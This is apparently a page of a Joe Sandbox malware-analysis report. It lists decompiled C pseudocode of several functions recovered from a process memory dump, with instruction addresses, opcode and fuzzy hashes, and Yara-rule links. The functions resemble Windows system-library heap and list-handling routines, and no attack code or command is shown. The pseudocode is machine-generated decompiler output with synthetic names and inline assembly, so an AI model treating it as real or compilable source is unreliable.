				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E045F76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L04604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0461fd9b
0x0461fda0
0x0461fda1
0x0461fdab
0x0461fdad
0x0461fdb0
0x0461fdb8
0x0461fe0f
0x0461fde6
0x0461fde9
0x0461fdec
0x0465c0c0
0x0461fdfe
0x0461fe06
0x0461fe06
0x0465c0c8
0x0461fe2d
0x0461fe2d
0x00000000
0x0461fe2d
0x0465c0d1
0x0465c0e0
0x0465c0e5
0x0465c0e5
0x0465c0e8
0x00000000
0x0465c0e8
0x0461fdf4
0x00000000
0x00000000
0x0461fdf6
0x0461fdfa
0x0461fe1a
0x0461fe1f
0x0461fe1f
0x0461fdfc
0x00000000
0x0461fdfc
0x0461fdcc
0x0461fdd0
0x0461fe26
0x00000000
0x0461fe26
0x0461fdd8
0x0461fddb
0x0461fddd
0x0461fde0
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 05f98afce0d1b6cd8651155cb111e25f769f05465a6cc42907ca7415878fbab2
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 3A217C72A40A41DBD739CF49C580A66F7E5EBA4B10F28816EE94587721F731BC02DB80

Uniqueness

Uniqueness Score: -1.00%

Function 045E9240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E045E9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x46bf708);
				E0463D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E046295D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E046295D0();
				_t33 =  *0x46d84c4; // 0x0
				L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x46d84c4; // 0x0
				L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x46d84c4; // 0x0
				E04602280(L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x46d86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E046295D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E046295D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E045E9325();
					_t50 =  *0x46d84c4; // 0x0
					return E0463D0D1(L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x045e9240
0x045e9242
0x045e9247
0x045e924c
0x045e924e
0x045e9255
0x045e9257
0x045e925a
0x045e925f
0x045e925f
0x045e9266
0x045e9271
0x045e9276
0x045e9279
0x045e927e
0x045e9295
0x045e929a
0x045e92b1
0x045e92b6
0x045e92d7
0x045e92dc
0x045e92e0
0x045e92e6
0x045e92e8
0x045e92ee
0x045e9332
0x045e9333
0x045e9337
0x045e9338
0x045e933a
0x045e933a
0x045e933d
0x045e9342
0x045e9342
0x045e9345
0x045e9349
0x045e934e
0x045e9352
0x045e9357
0x045e92f4
0x045e92f4
0x045e92f6
0x045e92f9
0x045e9300
0x045e9306
0x045e9324
0x045e9324

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6c4ddbf8e48182d5d1897f6db6b35eae74f654f983a9e618a46dee8bfbacbbe
Instruction ID: 375ec943e684b402a6e0285557fca979f60c22f81c08c24a873ac55dc8b9094f
Opcode Fuzzy Hash: d6c4ddbf8e48182d5d1897f6db6b35eae74f654f983a9e618a46dee8bfbacbbe
Instruction Fuzzy Hash: BA2148B1541A40DFD729EF28CA04F1AB7B9FF08708F04456CE059976A2EB34F945DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0461B390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0461B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E04602280(_t12, 0x46d8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E046200C2(0x46d8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x0461b395
0x0461b3a2
0x0461b3a5
0x0461b3aa
0x0461b3b2
0x0461b3ba
0x0461b3bd
0x0461b3c0
0x0461b3c4
0x0461b3c9
0x0465a3e9
0x0465a3ed
0x0465a3f0
0x0465a3ff
0x0465a403
0x0465a409
0x00000000
0x00000000
0x0465a40b
0x0465a40b
0x0465a40f
0x0465a415
0x0465a423
0x0465a423
0x0465a415
0x0461b3d1
0x0461b3e8
0x0461b3e8
0x0461b3d9

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67509a50efcbb1f8620b0fbe5cc87b8e8df51b1f46daa56a375dcf4edadf91ba
Instruction ID: 04f45124409e45e1997fccc52ed808decd997c3ff0b4799ba265301ff48befb4
Opcode Fuzzy Hash: 67509a50efcbb1f8620b0fbe5cc87b8e8df51b1f46daa56a375dcf4edadf91ba
Instruction Fuzzy Hash: F2116B337011209BDB189E569D81A2B7356EBD5734F28412DDD16D73A0F931BC02C694

Uniqueness

Uniqueness Score: -1.00%

Function 04674257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04674257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x46c08d0);
				E0463D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E046741E8(__ebx, __edi, __ecx, _t39);
				E045FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x46d87e4;
					_t18 =  *0x46d87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x46d5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x46d87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x46d87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L045E7055(_t31 + 0xfffffff8);
								_t24 =  *0x46d87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x46d87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x46d5cd0;
				if( *0x46d5cd0 <= 0) {
					L045E7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x46d87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x46d87e8 = _t30;
						 *0x46d87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0463D0D1(L04674320());
			}

0x04674257
0x04674257
0x04674257
0x04674259
0x0467425e
0x04674263
0x04674265
0x04674273
0x04674278
0x0467427c
0x0467427f
0x04674281
0x04674287
0x046742d7
0x046742d7
0x046742da
0x0467428d
0x0467428d
0x0467428f
0x04674292
0x04674297
0x0467429c
0x046742a0
0x046742a6
0x046742a8
0x046742ae
0x046742b3
0x00000000
0x046742ba
0x046742ba
0x046742bf
0x046742c5
0x046742ca
0x046742cf
0x046742d0
0x00000000
0x046742d0
0x046742b3
0x00000000
0x046742a6
0x0467429c
0x046742dc
0x046742dc
0x046742e3
0x04674309
0x046742e5
0x046742e5
0x046742e8
0x046742ee
0x046742f0
0x00000000
0x046742f2
0x046742f2
0x046742f4
0x046742f7
0x046742f9
0x04674300
0x04674300
0x046742f0
0x0467430e
0x0467431f

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34272bf8e52a03ab512870a678525783df7dd1e5104a1d36235c4d85e0bc0bef
Instruction ID: 18a066705bc8aabee0c57e2efc8c0084df1b5143bad7d811980b284d0ebaffe6
Opcode Fuzzy Hash: 34272bf8e52a03ab512870a678525783df7dd1e5104a1d36235c4d85e0bc0bef
Instruction Fuzzy Hash: B7213B70A02602DFD716EF66D048AA877E1FF85319B20926EC229CB760FB35A851CF40

Uniqueness

Uniqueness Score: -1.00%

Function 046646A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E046646A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L04604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0462F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0461D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L046077F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x046646b7
0x046646ba
0x046646c5
0x046646c8
0x046646d0
0x046646d4
0x046646e6
0x046646e9
0x046646f4
0x046646ff
0x04664705
0x04664706
0x0466470c
0x04664713
0x0466471b
0x04664723
0x04664725
0x046646d6
0x046646d9
0x046646db
0x046646db
0x04664732

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: c29669d6def20fc213b011eaffd6b6cb553f0f4d3618b237942ed61c14c663b2
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 4E112572604208BBD7059F5CD8808BEBBB9EF95304F10806EF944C7350EA31AD51D7A8

Uniqueness

Uniqueness Score: -1.00%

Function 04612397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E04612397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x46d848c != 0) {
					L0460FAD0(0x46d8610);
					if( *0x46d848c == 0) {
						E0460FA00(0x46d8610, _t19, _t27, 0x46d8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E04612581(0x46d8610, 0x45c50a0, _t26, _t27, _t28);
						E0460FA00(0x46d8610, 0x45c50a0, _t27, 0x46d8610);
					}
				} else {
					L1:
					_t11 =  *0x46d8614; // 0x0
					if(_t11 == 0) {
						_t11 = E04624886(0x45c1088, 1, 0x46d8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E04612581(0x46d8610, (_t11 << 4) + 0x45c5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x046123b0
0x046123b6
0x04612409
0x04612415
0x04655ae9
0x00000000
0x0461241b
0x0461241b
0x0461241d
0x04612427
0x0461242e
0x04612430
0x04612430
0x046123b8
0x046123b8
0x046123b8
0x046123bf
0x046123fc
0x046123fc
0x046123c1
0x046123c3
0x046123d0
0x046123d8
0x046123d8
0x046123dc
0x046123de
0x046123e1
0x046123e1
0x046123ec

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19319296f1f2ccc1aa8c078af587e99bb62fb42e36c3b029faf3493540a13582
Instruction ID: 4d45b43279caa402edd24d1bacb384ddf6833363e669f23c528f8c84d3ec36fc
Opcode Fuzzy Hash: 19319296f1f2ccc1aa8c078af587e99bb62fb42e36c3b029faf3493540a13582
Instruction Fuzzy Hash: 4D110831700350ABF334AA6A9C94B16B3D8EB60764F18845AE502F72A0F9B4FC019759

Uniqueness

Uniqueness Score: -1.00%

Function 046237F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E046237F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E04602280(_t6, 0x46d8550);
				}
				_t29 = E0462387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E045FFFB0(0x46d8550, _t27, 0x46d8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L046077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x046237fa
0x046237fc
0x04623805
0x04623808
0x04623808
0x04623814
0x04623818
0x04623846
0x04623848
0x0462384b
0x0462384b
0x04623852
0x00000000
0x04623854
0x04623856
0x00000000
0x00000000
0x04623863
0x00000000
0x04623863
0x0462381a
0x0462381a
0x0462381f
0x0462386e
0x0462386e
0x04623871
0x04623873
0x04623873
0x04623868
0x00000000
0x04623868
0x04623821
0x04623826
0x00000000
0x00000000
0x04623828
0x0462382a
0x04623841
0x00000000
0x04623841

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d2f04dea1fa9abd59e4c2da07920c03d7c2267bb49543c51f1b4686c61ab7e
Instruction ID: 5394d7537e2b38c70b3b8ac38700e266cc4d8b99f1b5d2ddb895b6468947effd
Opcode Fuzzy Hash: 09d2f04dea1fa9abd59e4c2da07920c03d7c2267bb49543c51f1b4686c61ab7e
Instruction Fuzzy Hash: E901C472A42A21ABD3278E299A40A26BBA6DF95B50715406DED458F315F73CF881CF80

Uniqueness

Uniqueness Score: -1.00%

Function 045EC962 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E045EC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x46dd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E045FEEF0(0x46d70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0466F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E045FEB70(_t29, 0x46d70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0462B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0466F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x46d70c0; // 0x0
					while(_t38 != 0x46d70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x46db1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x045ec96a
0x045ec974
0x045ec988
0x045ec98a
0x04657c9d
0x04657c9f
0x04657ca4
0x04657cae
0x04657cf0
0x04657cf5
0x04657cfa
0x045ec992
0x045ec996
0x045ec997
0x045ec998
0x045ec9a3
0x045ec9a3
0x04657cb0
0x04657cb7
0x04657cbb
0x00000000
0x00000000
0x04657cbd
0x04657ce8
0x04657cc5
0x04657cc8
0x04657cca
0x04657cd0
0x04657cd6
0x04657cde
0x04657ce4
0x04657ce4
0x04657cd0
0x00000000
0x04657ce8
0x045ec990
0x00000000

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 897b1da6ceadabd901eca2893f4827e700cdfde57c8996a068446ee82bb47174
Instruction ID: 094e5331809f8bb2b8e22271855452c2f5c1871d777df338cb9a8aa7cab1596e
Opcode Fuzzy Hash: 897b1da6ceadabd901eca2893f4827e700cdfde57c8996a068446ee82bb47174
Instruction Fuzzy Hash: 8E11E171B006069FD710AF68DC85A2BB7F5FB88616F400528ED42836A0FB20FC10DBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0461002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0461002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E04607D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E04607D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E04607D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E04607D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x04610032
0x04610037
0x04610043
0x04654b3a
0x04610049
0x04610049
0x04610049
0x0461004e
0x04610053
0x04654b48
0x04654b5a
0x04654b4a
0x04654b53
0x04654b53
0x04654b5f
0x00000000
0x04654b61
0x00000000
0x04654b61
0x04610059
0x04610059
0x04610060
0x04654b6f
0x04654b6f
0x04610069
0x04654b83
0x00000000
0x00000000
0x04654b90
0x04654b9b
0x04654b9b
0x04654ba4
0x00000000
0x00000000
0x04654baa
0x00000000
0x0461006f
0x0461006f
0x00000000
0x0461006f
0x04610069

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45c0000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 954916f727fe58a78c68c966f2b8232db7c6f3cf5910851b5aa3e4b92236231d
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 5F118E726056818FEB229B28D944B267795EF51759F0D00E5DD0487BF2FB28F8C2C264

Uniqueness

Uniqueness Score: -1.00%

Function 045F766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E045F766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0461F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0461F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L04604620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x045f7672
0x045f767f
0x045f7689
0x045f76de
0x045f76de
0x045f768b
0x045f7691
0x045f7693
0x045f7697
0x00000000
0x045f7699
0x045f76a8
0x00000000
0x045f76aa
0x045f76ad
0x045f76b1
0x00000000
0x045f76b3
0x045f76b3
0x045f76b5
0x045f76ba
0x045f76bc
0x045f76bc
0x045f76c0
0x00000000
0x045f76c2
0x045f76ce
0x045f76ce
0x045f76c0
0x045f76b1
0x045f76a8
0x045f7697
0x045f76d9

Memory Dump Source

Source File: 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: true

Associated: 00000015.00000002.510843490.00000000046DB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

